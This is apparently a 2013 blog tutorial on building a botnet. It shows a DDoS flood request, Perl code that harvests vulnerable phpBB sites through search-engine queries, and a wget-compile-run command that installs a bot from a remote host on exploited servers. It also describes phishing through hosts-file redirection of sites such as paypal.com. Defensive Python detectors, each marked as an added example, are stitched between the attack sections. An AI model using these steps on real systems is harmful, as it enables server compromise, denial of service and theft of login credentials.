Sunday, January 13, 2013

Create your own botnet

Security systems are constantly improving and programmers are becoming more skilled. Widely known errors are now made less and less often.

[Prologue]
The Internet is growing rapidly, and it is becoming harder for a hacker to find vulnerabilities. Administrators rely on the work of the best security experts. Recognize your own thoughts? In fact there are plenty of bugs on the Internet, but usually they are useless. Now imagine a situation: some network mongrel has got to you, and you want him punished. Today we will talk about creating your own botnet.

So what is a bot? The uninitiated picture the stupid enemies in computer games that you shoot down in two minutes. Yes, that is partly right. In our case a "bot" is a program that executes the commands built into it. It seems like nothing special. Someone will object: "I wrote such a thing at the age of five: press a button and the program, oh-la-la, closes" - forget your childhood. We all know that the possibilities of coding are boundless, and you can use it for good or for harm. Of course, we always use our work with good intentions. A botnet is a set of bots connected to a centre that synchronously execute the owner's commands. Bots, by the way, are mostly aimed at Windows machines. There you can steal passwords, set up SOCKS proxies or format the hard disk. I will depart from the rules and tell how botnets are created from nix systems. The basic function of our bot is DDoS attacks. It is the best way to use the big channels of nix servers. Let's count. The server you need to take down uses a 100Mb channel. So 10-20 bots standing on the same channel will fill up the server in a moment.


[Writing a bot]
You will find a listing of an example bot at the link at the end of the article. So let's look at the code. You can control your botnet through IRC or the web. Control through IRC was chosen for its interactivity. For example, I want to root a couple of servers in the botnet with local kernel exploits. I simply execute the command SH uname - and through the bot I find the machine I need in a moment. Then, having executed another command in the IRC client, I load a backdoor and receive an interactive shell for further actions. The possibilities are boundless. You will say it is possible through the web too, but why reload a page and spend traffic? It is more convenient to observe everything in real time (if there are 1000 bots or more, you may want to take care of the convenience of the interface - a comment from the voice of reason). A lot of people think that organizing a DDoS attack is very difficult. Here is an example of the code of a usual attack:

GET /server.org HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n

So we simply send a request to the server, forcing it to answer. And we keep sending it until the server goes down from a shortage of traffic or processor time. But you can't use only nix bots; it is also necessary to create a Windows botnet, for example with AgoBot. For this purpose it is possible to write code for the bot that scans the systems connecting to the server where the bot is installed for the lsass/dcom vulnerability.
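From the defending server's side, this flood is visible in the access log as one client repeating the same request, here with the self-contradictory User-Agent of the sample request (an X11 platform token next to a Windows OS token). The Python below is an added example, not code from the original article; the log lines are constructed, and the function names and the per-minute threshold are assumptions.

```python
import re
from collections import Counter, defaultdict

# User-Agent string taken from the request shown in the article.
BOT_UA = "Mozilla/4.75 [en] (X11; U; Windows 5.2 i686)"
GOOD_UA = "Mozilla/5.0 (X11; Linux x86_64)"

def _line(ip, sec, path, proto, ua):
    # Builds one constructed line in combined log format.
    return (f'{ip} - - [13/Jan/2013:10:00:{sec:02d} +0000] '
            f'"GET {path} {proto}" 200 512 "-" "{ua}"')

# Constructed sample log: eight flood requests plus two ordinary ones.
SAMPLE_LOG = "\n".join(
    [_line("198.51.100.7", s, "/server.org", "HTTP/1.0", BOT_UA) for s in range(8)]
    + [_line("203.0.113.9", 3, "/index.html", "HTTP/1.1", GOOD_UA),
       _line("203.0.113.9", 40, "/about.html", "HTTP/1.1", GOOD_UA)])

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]+" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def inconsistent_ua(ua):
    """Heuristic: a UA claiming X11 and Windows at once contradicts itself."""
    return "X11" in ua and "Windows" in ua

def find_flooders(log_text, threshold=5):
    """Return {ip: [reasons]} for clients that look like flood sources."""
    hits = Counter()
    reasons = defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # skip lines that are not in combined log format
        ip = m["ip"]
        # Bucket by minute: "13/Jan/2013:10:00" is the first 17 characters.
        hits[(ip, m["path"], m["ts"][:17])] += 1
        if inconsistent_ua(m["ua"]):
            reasons[ip].add("inconsistent-user-agent")
    for (ip, path, _minute), n in hits.items():
        if n >= threshold:
            reasons[ip].add(f"{n}x {path} in one minute")
    return {ip: sorted(r) for ip, r in reasons.items()}

if __name__ == "__main__":
    for ip, why in find_flooders(SAMPLE_LOG).items():
        print(ip, why)
```
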


[Creating botnet]
Actually, creating a botnet is very easy. For this purpose we need to find a vulnerability in some web script. The vulnerability found must allow shell commands to be executed. When you find a vulnerability, pay attention to the name of the file with the bug, its header and the name of the vulnerable system. Now, from this data, we need to build a good search query. For example, take the well-known vulnerability in phpBB <=2.0.10. The file's name is viewtopic.php, and the variable holding the forum topic's value is t. So the search query will be like "Powered by phpBB AND viewtopic.php? t =". The more sensible and simple the query you make, the more vulnerable servers will fall into your trap. Each search engine has its own query language, so read its description before making a query. Now all of this needs to be automated. In Perl, the request is sent like this:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") or next;
print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);

Next, we filter the results and run the exploit. The exploit must execute a command that starts our bot.

wget http://_server.org/bot.c; gcc bot.c-o bash; chmod +x bash;./bash;

Here we can see two problems. Wget and gcc may not be present, or their use may be forbidden. Here the downloaders fetch, curl and get will help us, or the console browser lynx, or the ftp protocol. Its implementation is more difficult - but the plus is that ftp is everywhere. As for the compiler, you can just build the binary on your own shell and hope that all will be ok ). Or rewrite the bot in an interpreted language - Perl or PHP.
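For the operator of the targeted web server, this download, compile and run chain appears in the request target of the vulnerable script, which makes it matchable in access logs or a request filter. The Python below is an added example, not code from the original article; the sample requests, the host bot-host.invalid, the script name script.php and the parameter arg are constructed placeholders, and the patterns are a heuristic rather than a complete rule set.

```python
import re
from urllib.parse import unquote, urlsplit

# Download tools the article names (lwp's GET is left out: too noisy as a word).
FETCH_RE = re.compile(
    r"(?:^|[;&|`\s(=])(?:wget|curl|fetch|lynx|ftp)\s+[^;&|]*?(?:https?|ftp)://",
    re.I)
# Compile / mark-executable / run-from-current-directory steps.
BUILD_RUN_RE = re.compile(r"\bgcc\b|\bchmod\s+\+x\b|(?:^|[;&|\s])\./\w", re.I)

def decode_fully(s, rounds=3):
    """Undo form encoding, including double percent-encoding."""
    s = s.replace("+", " ")      # '+' means space only before percent-decoding
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def classify(request_target):
    """Label a request target by what its decoded query string contains."""
    query = decode_fully(urlsplit(request_target).query)
    fetch = bool(FETCH_RE.search(query))
    build = bool(BUILD_RUN_RE.search(query))
    if fetch and build:
        return "download-and-execute"
    if fetch:
        return "remote-fetch"
    return "clean"

# Constructed sample request targets.
CHAIN = ("/script.php?arg=7%3Bwget%20http%3A%2F%2Fbot-host.invalid%2Fbot.c"
         "%3Bgcc%20bot.c%20-o%20bash%3Bchmod%20%2Bx%20bash%3B.%2Fbash")
DOUBLE_ENCODED = ("/script.php?arg=%2560curl%2520-O%2520http%253A%252F%252F"
                  "bot-host.invalid%252Fb%2560")
BENIGN = ["/viewtopic.php?t=7", "/search?q=curl+tutorial"]

if __name__ == "__main__":
    for target in [CHAIN, DOUBLE_ENCODED] + BENIGN:
        print(classify(target), target[:60])
```
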

[Phishing]
It is very convenient to use a bot to organize phishing. We need specially prepared pages (copying the original site we need) and good hosting, a dedicated server or a VDS. You can find such pages on the Internet, buy them or make them yourself. Mainly these are copies of sites such as paypal.com, moneybookers.com or something like those connected with money. Next, the Windows bot modifies the file \system32\drivers\etc\hosts, adding the IP address of your server and associating it with the needed domain name, for example paypal.com. When the user types paypal.com in his browser, he sees your page on your server - he types his login and password there, and they are logged in the place you need. But if the user uses a proxy server, it won't work.
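Because this redirection works through entries written into the hosts file, auditing that file for overrides of financial domains detects it directly. The Python below is an added example, not code from the original article; the hosts content and addresses are constructed, the watch list holds only the two domains the article names, and the function names are assumptions.

```python
import ipaddress

# Domains named in the article; a real watch list would be longer.
WATCHED = {"paypal.com", "moneybookers.com"}

# Constructed sample hosts file content.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
203.0.113.66    paypal.com www.paypal.com   # injected entry
0.0.0.0         ads.example.net
203.0.113.66    WWW.MONEYBOOKERS.COM.
10.0.0.5        intranet.corp.example
"""

def is_watched(name, watched):
    """True if name is a watched domain or one of its subdomains."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in watched)

def suspicious_entries(text, watched=WATCHED):
    """Return (line number, hostname, address) for watched names redirected
    to an address that is neither loopback nor unspecified."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                           # malformed line, not an entry
        if addr.is_loopback or addr.is_unspecified:
            continue                           # blocking entry, not a redirect
        for name in fields[1:]:
            if is_watched(name, watched):
                findings.append((lineno, name.lower().rstrip("."), str(addr)))
    return findings

if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS):
        print(finding)
```
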
